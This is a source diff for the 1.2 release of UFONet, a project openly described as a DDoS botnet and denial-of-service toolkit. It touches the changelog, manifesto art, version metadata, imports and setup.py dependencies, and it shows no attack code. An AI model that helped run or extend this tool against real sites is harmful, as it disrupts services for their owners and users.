@@ -3,7 +3,7 @@ Date	    Size      Version  Alias
 2013-06-18  7.6kB     0.1b
 2013-06-22  8.3kB     0.2b
 2014-09-17  12.6kB    0.3b
-2014-09-27  12.8kB    0.3.1b   Abduction
+2014-09-27  12.8kB    0.3.1b   Abduction!
 2014-12-16  36.3kB    0.4b     Infection!
 2015-05-24  59.0kB    0.5b     Invasion!
 2016-02-20  287.5kB   0.6      Galactic Offensive!
@@ -12,3 +12,4 @@ Date	    Size      Version  Alias
 2017-07-13  872.5kB   0.9      Blazar!
 2018-03-07  947.9kB   1.0      TachYon!
 2018-09-26  950.7kB   1.1      Quantum Hydra!
+2018-12-31  966.9Kb   1.2      Armageddon!

+ 1 - 1
docs/manifesto.txt

@@ -61,7 +61,7 @@
 =====-----_________-------------_______________··········:==4day
 ======_________=_=____________________=________==_=_______
 ·······÷÷;;;:·········÷÷÷÷××÷×÷÷×÷×÷÷×÷·÷÷÷÷·×···÷·····:||
- ||  Sluurg! FCKDRM! Sluurg!!!!!                        ||
+ ||  Sluurg! FCK.DRM! Sluurg!!!!!                       ||
 ·······÷÷;;;:·········÷÷÷÷××÷×÷÷×÷×÷÷×÷·÷÷÷÷·×·····÷÷··:||
  ||  In the land of humans; without space for honor,    ||
  ||  In the land of humans; just time for whores,       ||

+ 1 - 1
docs/release.date

@@ -1 +1 @@
-Wen Sep 26 00:11:12 2018
+Mon Dec 31 23:54:22 2018

+ 2 - 2
server/__init__.py

@@ -1,7 +1,7 @@
-#!/usr/bin/env python 
+#!/usr/bin/env python
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51

+ 1 - 11
server/blackhole.py

@@ -7,17 +7,7 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket
-import re
-import time
-import string
-import sys
-import urlparse
-import os
-import traceback
-import gzip
-import shutil
-import tempfile
+import socket, re, time, string, sys, urlparse, os, traceback, gzip, shutil, tempfile
 from threading import *
 
 class Computer(Thread):

docs/blackhole.txt → server/blackhole.txt


+ 1 - 8
server/grider.py

@@ -7,14 +7,7 @@ You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-import socket
-import re
-import time
-import string
-import sys
-import urlparse
-import os
-import traceback
+import socket, re, time, string, sys, urlparse, os, traceback
 from threading import *
 
 class Paster(Thread):

docs/grider.txt → server/grider.txt


+ 12 - 4
setup.py

@@ -1,4 +1,12 @@
 #!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+"""
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
+
+You should have received a copy of the GNU General Public License along
+with UFONet; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
 import sys
 
 if sys.version_info[0] != 2:
@@ -8,7 +16,7 @@ from setuptools import setup, find_packages
 
 setup(
     name='ufonet',
-    version='1.1',
+    version='1.2',
     license='GPLv3',
     author_email='epsylon@riseup.net',
     author='psy',
@@ -16,10 +24,10 @@ setup(
     url='https://ufonet.03c8.net/',
     long_description=open('docs/README.txt').read(),
     packages=find_packages(),
-    install_requires=['GeoIP >= 1.3.2', 'pygeoip >= 0.3.2', 'requests', 'pycrypto >= 2.6.1', 'pycurl >= 7.19.5.1', 'python-whois >= 0.6.5', 'scapy >= 2.3.3'],
+    install_requires=['GeoIP >= 1.3.2', 'pygeoip >= 0.3.2', 'requests', 'pycrypto >= 2.6.1', 'pycurl >= 7.19.5.1', 'python-whois >= 0.6.5', 'scapy >= 2.3.3', 'pydns >= 2.3.6'],
     include_package_data=True,
     package_data={
-        'core': ['images/*', 'js/*.css', 'js/*.js', 'js/leaflet/*.css', 'js/leaflet/*.js', 'js/leaflet/images/*', 'js/cluster/*', 'txt/*.txt'],
+        'core': ['js/*.css', 'js/*.js', 'js/leaflet/*.css', 'js/leaflet/*.js', 'js/leaflet/images/*', 'js/cluster/*', 'txt/*.txt', 'images/crew/*', 'images/aliens/*', 'images/*.png', 'images/*.ico'],
         'server': ['*.dat', '*.txt'],
     },
     entry_points={
@@ -30,7 +38,7 @@ setup(
             'ufonet=UFONet:core.main',
         ],
     },
-    keywords='WebAbuse DoS DDoS Botnet Darknet UFONet',
+    keywords='Toolkit WebAbuse DoS DDoS Botnet Darknet UFONet',
     classifiers=[
         'Development Status :: 5 - Production/Stable',
         "Environment :: Web Environment",

+ 2 - 2
ufonet

@@ -1,7 +1,7 @@
-#!/usr/bin/env python 
+#!/usr/bin/env python
 # -*- coding: utf-8 -*-"
 """
-UFONet - DDoS Botnet via Web Abuse - 2013/2014/2015/2016 - by psy (epsylon@riseup.net)
+UFONet - Denial of Service Toolkit - 2013/2018 - by psy (epsylon@riseup.net)
 
 You should have received a copy of the GNU General Public License along
 with UFONet; if not, write to the Free Software Foundation, Inc., 51